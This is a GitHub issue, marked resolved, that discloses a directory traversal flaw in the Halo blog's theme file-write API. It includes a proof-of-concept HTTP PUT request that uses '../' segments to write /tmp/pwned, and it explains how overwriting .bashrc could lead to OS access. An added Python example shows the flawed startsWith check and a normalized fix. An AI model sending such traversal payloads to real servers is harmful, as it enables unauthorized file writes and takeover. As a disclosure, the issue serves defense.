An Arbitrary file writing vulnerability in the backend #421

Closed
5 tasks done
any-how opened this issue Dec 11, 2019 · 0 comments
Labels: kind/bug (Categorizes issue or PR as related to a bug), resolved, vulnerability

Comments


any-how commented Dec 11, 2019

I am sure I have checked.

I want to apply: BUG feedback

The backend has an interface for writing files. A directory traversal check is performed on the input path parameter, but because it uses the startsWith function, it can be bypassed.

```http
PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}
```


Therefore, an attacker can overwrite files such as .ftl files or the .bashrc in the user's home directory, and finally obtain operating system permissions.
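To show why the prefix check described in this report fails and what a correct check looks like, here is an added Python example (not Halo's own code); the theme root and request body are taken from the PoC above, and the function names are assumptions.

```python
import json
import posixpath

# Theme root taken from the path in the report (constructed example, not Halo's code).
THEME_ROOT = "/root/.halo/templates/themes/anatole"

# Request body from the PoC above, embedded here as constructed sample input.
POC_BODY = ('{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned",'
            '"content":"xxxxx\\nxxxttt\\nbb"}')


def vulnerable_check(path: str, root: str = THEME_ROOT) -> bool:
    """The pattern the report describes: a startsWith test on the raw string.

    The PoC path begins with the theme root, so it passes, even though the
    embedded '..' segments make it resolve to /tmp/pwned.
    """
    return path.startswith(root)


def hardened_check(path: str, root: str = THEME_ROOT) -> bool:
    """Normalize first, then require the result to be the root itself or a
    path strictly under it (the trailing '/' also rejects sibling directories
    such as '/root/.halo/templates/themes/anatole-evil').

    posixpath.normpath needs no filesystem, so this runs anywhere; on a live
    system use os.path.realpath instead so symlinks are resolved as well.
    """
    root_n = posixpath.normpath(root)
    path_n = posixpath.normpath(path)
    return path_n == root_n or path_n.startswith(root_n + "/")


def resolved_target(path: str) -> str:
    """Where a write to `path` would actually land after '..' collapsing."""
    return posixpath.normpath(path)


def request_allowed(body: str, root: str = THEME_ROOT) -> bool:
    """Apply the hardened check to the 'path' field of a JSON request body."""
    path = json.loads(body)["path"]
    return hardened_check(path, root)
```

Running `request_allowed(POC_BODY)` rejects the report's request, while `vulnerable_check` on the same path accepts it.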

@JohnNiang added the kind/bug, resolved and vulnerability labels Dec 12, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023